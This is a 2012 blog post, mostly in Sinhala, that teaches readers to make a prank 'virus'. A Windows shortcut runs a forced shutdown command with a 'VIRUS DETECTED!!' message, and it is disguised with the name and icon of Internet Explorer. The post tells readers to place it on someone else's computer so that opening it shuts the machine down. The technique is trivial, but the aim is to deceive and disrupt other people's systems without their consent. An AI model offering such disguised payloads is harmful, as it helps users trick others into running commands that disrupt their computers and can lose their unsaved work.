Thursday, November 8, 2012

Make a computer virus.. using shortcuts.......................:D




ඔන්න යාලුවනව බය කරන්න නියම වෛරස් එක....(මේක හදන්න ඔයාටම පුලුවන්)..
මුලින්ම ඩෙක්ස්ටොප් එකේ(වෙන තැනක වුනත් කමක් නැහැ) right click කරලා new>shortcut වලට ගිහිල්ලා... shortcut location එකට ඔය පල්ලෙහා තියෙන කොඩ් එක ටෛප් කරන්න (කොපි කලත් කමක් නහැ)....

shutdown -s -t 30 -c "VIRUS DETECTED!!"



දැන් next එකට ක්ලිච්ක් කරලා name එකට internet explorer කියලා දෙන්න...

දැන් finish කරන්න...
දැන් shortcut එක උඩ right click කරලා....properties වලට යන්න..

ඊටපස්සේ change icon වලට ගිහිල්ලා එතනින් internet ecsplorer වල icon එක select කරන්න...  දැන්apply කරන්න.......


 ඔන්න දැන් මේක වෙන කාගේහරි කොම් එකකට දානා....open කලොත් කොම් එක shut down

0 Comments:

Post a Comment